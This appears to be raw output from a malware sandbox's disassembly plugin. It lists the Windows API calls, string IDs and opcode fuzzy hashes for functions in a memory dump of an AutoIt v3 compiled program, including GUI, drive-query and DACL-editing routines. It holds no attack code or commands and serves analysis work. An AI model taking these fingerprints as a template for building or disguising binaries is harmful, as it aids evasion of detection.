                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137FE
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13805
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00A13810
                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13822
                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A30C04,00000000), ref: 00A13838
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00A13848
                                                                                                                                                                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A1386E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A1388D
                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A138AF
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13A9C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                  • Opcode ID: b878812ff1c5abb398ea0aec164bc430ce6045b6bfe3cde094563a1455638bef
                                                                                                                                                                                                                                  • Instruction ID: 00fd1eb8ffbd558c450002e9e71a25cfc27a9f5c2fd1a5666b871f20863043b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b878812ff1c5abb398ea0aec164bc430ce6045b6bfe3cde094563a1455638bef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92027F72900215AFDF14DFA8CD49EAE7BB9FF48310F148158F915AB2A1C774AD42CB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00A27B67
                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A27B98
                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00A27BA4
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00A27BBE
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00A27BCD
                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00A27BF8
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 00A27C00
                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00A27C07
                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00A27C16
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00A27C1D
                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00A27C68
                                                                                                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 00A27C9A
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A27CBC
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColor.USER32(00000012), ref: 00A27E5B
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SetTextColor.GDI32(?,00A27B2D), ref: 00A27E5F
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColorBrush.USER32(0000000F), ref: 00A27E75
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColor.USER32(0000000F), ref: 00A27E80
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColor.USER32(00000011), ref: 00A27E9D
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A27EAB
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SelectObject.GDI32(?,00000000), ref: 00A27EBC
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SetBkColor.GDI32(?,?), ref: 00A27EC5
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SelectObject.GDI32(?,?), ref: 00A27ED2
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00A27EF1
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A27F08
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetWindowLongW.USER32(?,000000F0), ref: 00A27F15
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4124339563-0
                                                                                                                                                                                                                                  • Opcode ID: 113017ec88992003620b7fad47a8d37809ddf65881329da047cd4beffb0c2927
                                                                                                                                                                                                                                  • Instruction ID: 71b01b0f58613382e546876a42806ca6c118108e31a921d0d921ec421cb97b99
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 113017ec88992003620b7fad47a8d37809ddf65881329da047cd4beffb0c2927
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBA18E72008311AFD721DFA8DC48E6FBBA9FF48324F100A29F962961E1D775D946CB51
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 009916B4
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 009D2B07
                                                                                                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009D2B40
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009D2F85
                                                                                                                                                                                                                                    • Part of subcall function 00991802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00991488,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 00991865
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001053), ref: 009D2FC1
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009D2FD8
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D2FEE
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D2FF9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0
• API String ID: 2760611726-4108050209
• Opcode ID: 79caddd68786ce56799d40729c44f458cb30fe511b260139803ec5898d589ff7
• Instruction ID: 9964901bf067ee2667a0d956647c6b01757dabc50e84055db244050b7148f5be
• Opcode Fuzzy Hash: 79caddd68786ce56799d40729c44f458cb30fe511b260139803ec5898d589ff7
• Instruction Fuzzy Hash: 2212BD30644602AFDB25CF68C854BB9BBF9FB94300F18856AF4959B261C775EC82CF91
APIs
• DestroyWindow.USER32(00000000), ref: 00A1319B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A132C7
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A13306
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A13316
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A1335D
• GetClientRect.USER32(00000000,?), ref: 00A13369
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A133B2
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A133C1
• GetStockObject.GDI32(00000011), ref: 00A133D1
• SelectObject.GDI32(00000000,00000000), ref: 00A133D5
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A133E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A133EE
• DeleteDC.GDI32(00000000), ref: 00A133F7
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A13423
• SendMessageW.USER32(00000030,00000000,00000001), ref: 00A1343A
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A1347A
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A1348E
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00A1349F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A134D4
• GetStockObject.GDI32(00000011), ref: 00A134DF
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A134EA
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A134F4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: b70a89df6afb3a5ac1822f1f6b170e541ff2f531c1f2161c3a0b1ac2f0eff770
• Instruction ID: 2270a13eddca40836d869578821e99080138cc7c33720bbfe4dfde06d0669ccc
• Opcode Fuzzy Hash: b70a89df6afb3a5ac1822f1f6b170e541ff2f531c1f2161c3a0b1ac2f0eff770
• Instruction Fuzzy Hash: DCB14DB1A00215AFEF14DFA8DC4AFAE7BB9EB48710F104114F915EB291D7B4AD41CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00A05532
• GetDriveTypeW.KERNEL32(?,00A2DC30,?,\\.\,00A2DCD0), ref: 00A0560F
• SetErrorMode.KERNEL32(00000000,00A2DC30,?,\\.\,00A2DCD0), ref: 00A0577B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: dc44c1117feb83861c6219be63859b82cb0bcd315c4d9472de0e7fc97b3c8d55
• Instruction ID: c899a9f8d15815ce9dfa85cd51a0ba726ee0cf8b4ae9409ec5b54c9b3b3f76e2
• Opcode Fuzzy Hash: dc44c1117feb83861c6219be63859b82cb0bcd315c4d9472de0e7fc97b3c8d55
• Instruction Fuzzy Hash: 2861CF31E08A0DEBCB24DF38E99197E73B1BF54351B284825E806BB2D1D6329D06EF41
APIs
• GetCursorPos.USER32(?), ref: 00A21BC4
• GetDesktopWindow.USER32 ref: 00A21BD9
• GetWindowRect.USER32(00000000), ref: 00A21BE0
• GetWindowLongW.USER32(?,000000F0), ref: 00A21C35
• DestroyWindow.USER32(?), ref: 00A21C55
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A21C89
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A21CA7
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A21CB9
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00A21CCE
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A21CE1
• IsWindowVisible.USER32(00000000), ref: 00A21D3D
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A21D58
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A21D6C
• GetWindowRect.USER32(00000000,?), ref: 00A21D84
• MonitorFromPoint.USER32(?,?,00000002), ref: 00A21DAA
• GetMonitorInfoW.USER32(00000000,?), ref: 00A21DC4
• CopyRect.USER32(?,?), ref: 00A21DDB
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00A21E46
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 5b7d2c2f50a4dfc8906d49d740e0b656c07d8ba54c478b7c8bae56bfe8c63daf
• Instruction ID: 1847a7d48c0976cbe737c6a158643a640a583411d4ec62fd15e36977a2b83429
• Opcode Fuzzy Hash: 5b7d2c2f50a4dfc8906d49d740e0b656c07d8ba54c478b7c8bae56bfe8c63daf
• Instruction Fuzzy Hash: 77B19E71604351AFDB14DF68D884B6ABBE5FF94310F00892CF9999B2A2C731E845CB92
APIs
• CharUpperBuffW.USER32(?,?), ref: 00A20D81
• _wcslen.LIBCMT ref: 00A20DBB
• _wcslen.LIBCMT ref: 00A20E25
• _wcslen.LIBCMT ref: 00A20E8D
• _wcslen.LIBCMT ref: 00A20F11
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A20F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A20FA0
  • Part of subcall function 009AFD52: _wcslen.LIBCMT ref: 009AFD5D
  • Part of subcall function 009F2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009F2BA5
  • Part of subcall function 009F2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009F2BD7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                  • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                  • Opcode ID: 272de667a00b2192c136dd46ac254de8c912616f6fc63494a2f53da44de37a6f
                                                                                                                                                                                                                                  • Instruction ID: 5382ae2b472d3a96c88b0e56845d5c55228e021cf46a6275a98e3d05cf9af71e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 272de667a00b2192c136dd46ac254de8c912616f6fc63494a2f53da44de37a6f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95E1CD312082518FCB14DF2CD951A7AB7E6BFD8314B14496CF896AB3A2DB30ED45CB91
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009925F8
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00992600
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099262B
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00992633
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00992658
                                                                                                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00992675
                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00992685
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009926B8
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009926CC
                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 009926EA
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00992706
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00992711
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetCursorPos.USER32(?), ref: 009919E1
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: ScreenToClient.USER32(00000000,?), ref: 009919FE
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000001), ref: 00991A23
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000002), ref: 00991A3D
                                                                                                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,0099199C), ref: 00992738
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                  • Opcode ID: 4aef746d3146be3e005b5b58a738f7bf137d10e92c9005c97f6b5b5982be598f
                                                                                                                                                                                                                                  • Instruction ID: 45da345f19a3b3c33f683308ef24ba05e112a96fcf3ce61c02b9615d93e92ea4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aef746d3146be3e005b5b58a738f7bf137d10e92c9005c97f6b5b5982be598f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EB16A31A40209AFDF14DFACCC55BAE7BB4FB88315F10822AFA15A7290D774E942CB51
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009F1A60
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A6C
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A7B
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A82
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009F1A99
                                                                                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009F1741
                                                                                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009F1775
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F178C
                                                                                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009F17C6
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009F17E2
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F17F9
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009F1801
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009F1808
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009F1829
                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 009F1830
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009F185F
                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009F1881
                                                                                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009F1893
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F18BA
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18C1
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F18CA
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18D1
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F18DA
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18E1
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009F18ED
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18F4
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: GetProcessHeap.KERNEL32(00000008,009F14FD,?,00000000,?,009F14FD,?), ref: 009F1AED
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009F14FD,?), ref: 009F1AF4
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009F14FD,?), ref: 009F1B03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4175595110-0
                                                                                                                                                                                                                                  • Opcode ID: d7287bb6bc47a43c98665e4a907c6e3b1e6a1de697b4187497f5afb99e0e92f2
                                                                                                                                                                                                                                  • Instruction ID: 4b39cf035d74fe6ff05fa494ed4158ec9ad52f5d4e6d1b1276404e1a1bee2898
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7287bb6bc47a43c98665e4a907c6e3b1e6a1de697b4187497f5afb99e0e92f2
